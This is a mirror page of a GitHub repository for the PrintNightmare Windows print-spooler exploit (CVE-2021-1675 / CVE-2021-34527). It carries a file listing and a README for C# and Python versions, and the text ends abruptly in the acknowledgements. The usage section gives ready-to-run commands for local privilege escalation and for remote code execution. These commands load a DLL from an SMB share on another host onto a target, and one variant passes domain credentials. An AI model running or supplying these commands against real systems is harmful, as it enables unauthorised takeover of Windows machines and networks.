mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-21 18:26:35 +00:00
640d1984cd
Signed-off-by: cube0x0 <vidfelt@protonmail.com> |
||
---|---|---|
.. | ||
SharpPrintNightmare | ||
CVE-2021-1675.py | ||
README.md |
C# Implementation of CVE-2021-1675 / CVE-2021-34527
Update
New CVE-2021-1675.py
has been uploaded which will get the same result as the C# version
No longer need to manually specify pConfigFile with C# version
Usage
The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll
#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'
#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123
Acknowledgements
For contributing new ideas or exploit improvements, thanks to